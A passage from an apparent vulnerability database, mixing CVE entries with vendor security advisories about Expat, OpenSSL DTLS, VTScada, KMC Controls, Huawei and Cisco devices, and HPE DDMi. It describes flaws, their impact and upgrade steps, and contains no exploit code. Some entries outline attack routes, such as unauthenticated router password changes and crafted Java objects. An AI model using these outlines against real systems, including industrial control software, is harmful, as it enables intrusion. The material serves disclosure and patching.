are multiple connections in a state where memory has been allocated for
the connection; SSL_free() has not yet been called; and there is
insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to
be transitory because as soon as the connection fails the memory is
subsequently freed again in the SSL_free() call. However there is an
increased risk during this period of application crashes due to the lack
of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL
version 1.0.1 will cease on 31st December 2016. No security updates for that
version will be provided after that date. Users of 1.0.1 are advised to
upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those
versions are no longer receiving security updates.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details
over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/policies/secpolicy.html
VAR-201606-0135 | CVE-2016-5300 | Expat XML Parser Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
The XML parser in Expat does not use sufficient entropy for hash initialization, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted identifiers in an XML document. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0876. The Expat library is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable XML parsing library.
Note : This issue is the result of an incomplete fix for the CVE-2012-0876 described in 52379 (Expat XML Parsing Multiple Remote Denial of Service Vulnerabilities).
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Message-ID: <57683228.8060901@canonical.com>
Subject: [USN-3013-1] XML-RPC for C and C++ vulnerabilities
============================================================================
Ubuntu Security Notice USN-3013-1
June 20, 2016
xmlrpc-c vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in XML-RPC for C and C++.
Software Description:
- xmlrpc-c: Lightweight RPC library based on XML and HTTP
Details:
It was discovered that the Expat code in XML-RPC for C and C++ unexpectedly
called srand in certain circumstances. This could reduce the security of
calling applications. (CVE-2012-6702)
It was discovered that the Expat code in XML-RPC for C and C++ incorrectly
handled seeding the random number generator. A remote attacker could
possibly use this issue to cause a denial of service. (CVE-2016-5300)
Gustavo Grieco discovered that the Expat code in XML-RPC for C and C++
incorrectly handled malformed XML data. (CVE-2016-0718)
It was discovered that the Expat code in XML-RPC for C and C++ incorrectly
handled malformed XML data.
(CVE-2015-1283, CVE-2016-4472)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libxmlrpc-c++4 1.16.33-3.1ubuntu5.2
libxmlrpc-core-c3 1.16.33-3.1ubuntu5.2
After a standard system upgrade you need to restart any applications linked
against XML-RPC for C and C++ to effect the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3013-1
CVE-2012-6702, CVE-2015-1283, CVE-2016-0718, CVE-2016-4472,
CVE-2016-5300
Package Information:
https://launchpad.net/ubuntu/+source/xmlrpc-c/1.16.33-3.1ubuntu5.2
-------------------------------------------------------------------------
Debian Security Advisory DSA-3597-1                   security@debian.org
https://www.debian.org/security/                            Luciano Bello
June 07, 2016                         https://www.debian.org/security/faq
-------------------------------------------------------------------------
Package : expat
CVE ID : CVE-2012-6702 CVE-2016-5300
Two related issues have been discovered in Expat, a C library for parsing
XML.
CVE-2012-6702
Stefan Sørensen discovered that the use of the function XML_Parse() seeds
the random number generator, generating repeated outputs for rand() calls.
CVE-2016-5300
This issue is the result of an incomplete fix for CVE-2012-0876.
You might need to manually restart programs and services using expat
libraries.
For the stable distribution (jessie), these problems have been fixed in
version 2.1.0-6+deb8u3.
For the unstable distribution (sid), these problems have been fixed in
version 2.1.1-3.
We recommend that you upgrade your expat packages.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201701-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Expat: Multiple vulnerabilities
Date: January 11, 2017
Bugs: #458742, #555642, #577928, #583268, #585510
ID: 201701-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Expat, the worst of which
may allow execution of arbitrary code.
Background
==========
Expat is a set of XML parsing libraries.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/expat < 2.2.0-r1 >= 2.2.0-r1
Description
===========
Multiple vulnerabilities have been discovered in Expat. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker, by enticing a user to process a specially crafted
XML file, could execute arbitrary code with the privileges of the
process or cause a Denial of Service condition. This attack could also
be used against automated systems that arbitrarily process XML files.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Expat users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/expat-2.2.0-r1"
References
==========
[ 1 ] CVE-2012-6702
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6702
[ 2 ] CVE-2013-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0340
[ 3 ] CVE-2015-1283
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1283
[ 4 ] CVE-2016-0718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0718
[ 5 ] CVE-2016-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4472
[ 6 ] CVE-2016-5300
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5300
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-21
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
APPLE-SA-2017-03-28-2 Additional information for
APPLE-SA-2017-03-22-1 iTunes for Windows 12.6
iTunes for Windows 12.6 addresses the following:
APNs Server
Available for: Windows 7 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A client certificate was sent in plaintext. This issue
was addressed through improved certificate handling.
CVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical
University Munich (TUM)
Entry added March 28, 2017
iTunes
Available for: Windows 7 and later
Impact: Multiple issues in SQLite and expat
Description: Multiple issues existed in SQLite and expat. The SQLite
issues were addressed by updating SQLite to version 3.15.2. The expat
issues were addressed by updating expat to version 2.2.0.
CVE-2009-3270
CVE-2009-3560
CVE-2009-3720
CVE-2012-1147
CVE-2012-1148
CVE-2012-6702
CVE-2015-1283
CVE-2016-0718
CVE-2016-4472
CVE-2016-5300
libxslt
Available for: Windows 7 and later
Impact: Multiple vulnerabilities in libxslt
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-5029: Holger Fuhrmannek
Entry added March 28, 2017
WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab
(tencent.com) working with Trend Micro's Zero Day Initiative
Entry added March 28, 2017
WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in element handling. This
issue was addressed through improved validation.
CVE-2017-2479: lokihardt of Google Project Zero
CVE-2017-2480: lokihardt of Google Project Zero
Entry added March 28, 2017
Installation note:
iTunes for Windows 12.6 may be obtained from:
https://www.apple.com/itunes/download/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
VAR-201606-0254 | CVE-2016-4523 | Trihedral VTScada Buffer Overflow Vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The WAP interface in Trihedral VTScada (formerly VTS) 8.x through 11.x before 11.2.02 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via unspecified vectors. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Trihedral VTScada. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of Wireless Application Protocol requests. The issue lies in the failure to traverse user-supplied paths. An attacker can leverage this vulnerability to execute code under the context of the user running the service. Trihedral VTScada (formerly known as VTS) is a SCADA system based on the Windows platform provided by Trihedral Engineering of Canada. A buffer overflow vulnerability exists in the WAP interface of Trihedral VTScada 8.x through 11.x before 11.2.02. VTScada is prone to multiple security vulnerabilities.
Exploiting these issues will allow attackers to obtain sensitive information, cause denial-of-service conditions or to bypass certain security restrictions and perform unauthorized actions.
VTScada versions 8 through 11.2.x are vulnerable
VAR-201606-0247 | CVE-2016-4510 | Trihedral VTScada Authorization Issue Vulnerability |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
The WAP interface in Trihedral VTScada (formerly VTS) 8.x through 11.x before 11.2.02 allows remote attackers to bypass authentication and read arbitrary files via unspecified vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of Wireless Application Protocol requests. The issue lies in the failure to properly validate user-supplied filenames. An attacker can leverage this vulnerability to disclose the contents of arbitrary files under the context of the user running the service. Trihedral VTScada (formerly known as VTS) is a SCADA system based on the Windows platform provided by Trihedral Engineering of Canada. An authorization vulnerability exists in the WAP interface of Trihedral VTScada 8.x through 11.x before 11.2.02. VTScada is prone to multiple security vulnerabilities.
Exploiting these issues will allow attackers to obtain sensitive information, cause denial-of-service conditions or to bypass certain security restrictions and perform unauthorized actions.
VTScada versions 8 through 11.2.x are vulnerable
VAR-201611-0179 | CVE-2016-7160 | Samsung Mobile Service disruption on devices (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
A vulnerability on Samsung Mobile M(6.0) devices exists because external access to SystemUI activities is not properly restricted, leading to a SystemUI crash and device restart, aka SVE-2016-6248. The vendor has confirmed this vulnerability and released it as SVE-2016-6248. Supplementary information: the CWE vulnerability type has been identified as CWE-476: NULL Pointer Dereference (http://cwe.mitre.org/data/definitions/476.html). Service operation may be interrupted (SystemUI crash and device restart). Samsung Mobile is a series of smart mobile devices released by South Korea's Samsung. Samsung Mobile L(5.0), L(5.1) and M(6.0) devices using the Exynos 7420 chipset are affected by a denial-of-service vulnerability. An attacker could exploit the vulnerability to cause a denial of service.
VAR-201606-0244 | CVE-2016-4494 | KMC Controls BAC-5051E Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
Cross-site request forgery (CSRF) vulnerability on KMC Controls BAC-5051E devices with firmware before E0.2.0.2 allows remote attackers to hijack the authentication of unspecified victims for requests that disclose the contents of a configuration file. KMC Controls BAC-5051E is a router product used in building automation systems by KMC Controls, USA. KMC Controls BAC-5051E router is prone to the following security vulnerabilities:
1. An information-disclosure vulnerability
2. A cross-site Request-forgery vulnerability
An attacker can exploit these issues to obtain potentially sensitive information and perform unauthorized administrative actions. Other attacks are also possible.
Versions prior to BAC-5051E E0.2.0.2 are vulnerable
VAR-201606-0245 | CVE-2016-4495 | KMC Controls BAC-5051E Vulnerability that bypasses access restrictions in device firmware |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
KMC Controls BAC-5051E devices with firmware before E0.2.0.2 allow remote attackers to bypass intended access restrictions and read a configuration file via unspecified vectors. Supplementary information: the CWE vulnerability type has been identified as CWE-284: Improper Access Control. KMC Controls BAC-5051E is a router product used in building automation systems by KMC Controls, USA. A security vulnerability exists in KMC Controls BAC-5051E with firmware prior to E0.2.0.2. KMC Controls BAC-5051E router is prone to the following security vulnerabilities:
1. An information-disclosure vulnerability
2. A cross-site Request-forgery vulnerability
An attacker can exploit these issues to obtain potentially sensitive information and perform unauthorized administrative actions. Other attacks are also possible.
Versions prior to BAC-5051E E0.2.0.2 are vulnerable
VAR-201606-0550 | No CVE | Fei Xun K2 wireless router exists unauthorized password modification vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Fixon K2 wireless router is a wireless router for home use.
The Fixon K2 wireless router has an unauthorized password modification vulnerability. An attacker who has not logged in to the management console can exploit this vulnerability by directly submitting a request packet that modifies the username and password.
VAR-201606-0551 | No CVE | AB CompactLogix 5000 Series Controller CIP Protocol Denial of Service Vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
The AB CompactLogix 5000 series is a controller for Logix solutions for low-end to mid-range applications.
The CIP communication protocol implementation of the AB CompactLogix 5000 series controller has vulnerabilities. After a vulnerability is successfully exploited, the target device can no longer respond normally to some CIP function code requests, so all Ethernet monitoring data collection or control instruction distribution that relies on these function codes will fail, which seriously affects on-site production.
VAR-201606-0456 | CVE-2016-5365 | Huawei Honor WS851 Router software stack-based buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Stack-based buffer overflow in Huawei Honor WS851 routers with software 1.1.21.1 and earlier allows remote attackers to execute arbitrary commands with root privileges via unspecified vectors, aka HWPSIRT-2016-05051. The Huawei Honor WS851 router software contains a stack-based buffer overflow vulnerability. The vendor has confirmed this vulnerability and released it as HWPSIRT-2016-05051. A third party may execute arbitrary commands with root authority. Huawei WS851 is a wireless router product from China's Huawei company. A security vulnerability exists in versions prior to Huawei WS851 1.1.21.1 because the program fails to check parameters. An attacker could exploit this vulnerability to trigger a stack overflow, remotely gain root privileges, and execute a shell.
Attackers may be able to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Huawei Honor WS851 Routers running firmware versions 1.1.21.1 and prior are vulnerable
VAR-201606-0458 | CVE-2016-5367 | Huawei Honor WS851 Vulnerability to obtain important information in router software |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Huawei Honor WS851 routers with software 1.1.21.1 and earlier allow remote attackers to obtain sensitive information via unspecified vectors, aka HWPSIRT-2016-05053. The Huawei Honor WS851 router software contains a vulnerability that allows important information to be captured. The vendor has confirmed this vulnerability and released it as HWPSIRT-2016-05053. Important information may be obtained by a third party. Huawei WS851 is a wireless router product from China's Huawei company. A security vulnerability exists in versions prior to Huawei WS851 1.1.21.1 because the program fails to validate parameters.
Huawei Honor WS851 firmware 1.1.21.1 and prior are vulnerable
VAR-201606-0260 | CVE-2016-4532 | Trihedral VTScada Directory Traversal Vulnerability |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
Directory traversal vulnerability in the WAP interface in Trihedral VTScada (formerly VTS) 8.x through 11.x before 11.2.02 allows remote attackers to read arbitrary files via a crafted pathname. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Trihedral VTScada. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of Wireless Application Protocol requests. The issue lies in the failure to properly restrict the path from which images are retrieved. An attacker can leverage this vulnerability to disclose the contents of arbitrary files under the context of the user running the service. Trihedral VTScada (formerly known as VTS) is a SCADA system based on the Windows platform provided by Trihedral Engineering of Canada. VTScada is prone to multiple security vulnerabilities.
Exploiting these issues will allow attackers to obtain sensitive information, cause denial-of-service conditions or to bypass certain security restrictions and perform unauthorized actions.
VTScada versions 8 through 11.2.x are vulnerable
VAR-201606-0274 | CVE-2016-1418 | Multiple Cisco Aironet access point software Linux root access vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Cisco Aironet Access Point Software 8.2(100.0) on 1830e, 1830i, 1850e, 1850i, 2800, and 3800 access points allows local users to obtain Linux root access via crafted CLI command parameters, aka Bug ID CSCuy64037. The Cisco Aironet 1800/2800/3800 Series AccessPoint is a small to medium wireless network access point product. A security vulnerability exists in the command line interpreter for Cisco Aironet 1800/2800/3800 Series AccessPoint.
This issue is being tracked by Cisco Bug ID CSCuy64037.
VAR-201606-0410 | CVE-2016-4369 | HPE Discovery and Dependency Mapping Inventory Vulnerabilities in arbitrary command execution |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
HPE Discovery and Dependency Mapping Inventory (DDMi) 9.30, 9.31, 9.32, 9.32 update 1, 9.32 update 2, and 9.32 update 3 allows remote authenticated users to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections library. Supplementary information: the CWE vulnerability type has been identified as CWE-284: Improper Access Control (http://cwe.mitre.org/data/definitions/284.html). Arbitrary commands may be executed by a remotely authenticated user via a crafted serialized Java object. HP Discovery and Dependency Mapping Inventory is prone to a remote code-execution vulnerability.
Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts may result in a denial-of-service condition.
HP Discovery and Dependency Mapping Inventory 9.30, 9.31, 9.32, 9.32 update 1, 9.32 update 2, and 9.32 update 3 are vulnerable.
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05164819
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05164819
Version: 1
HPSBGN03619 rev.1 - HPE Discovery and Dependency Mapping Inventory (DDMi)
using Java Deserialization, remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible. The vulnerability could be exploited remotely to allow
remote code execution.
References:
CVE-2016-4369
CERT-VU#576313
SSRT110134
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP DDMI Inventory Software Series 9.30, 9.31, 9.32, 9.32 update 1, 9.32
update 2, and 9.32 update 3
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2016-4369 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE has made the following mitigation information available to resolve the
vulnerability for the impacted versions of Discovery and Dependency Mapping
Inventory (DDMi):
https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02338864
HISTORY
Version:1 (rev.1) - 6 June 2016 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.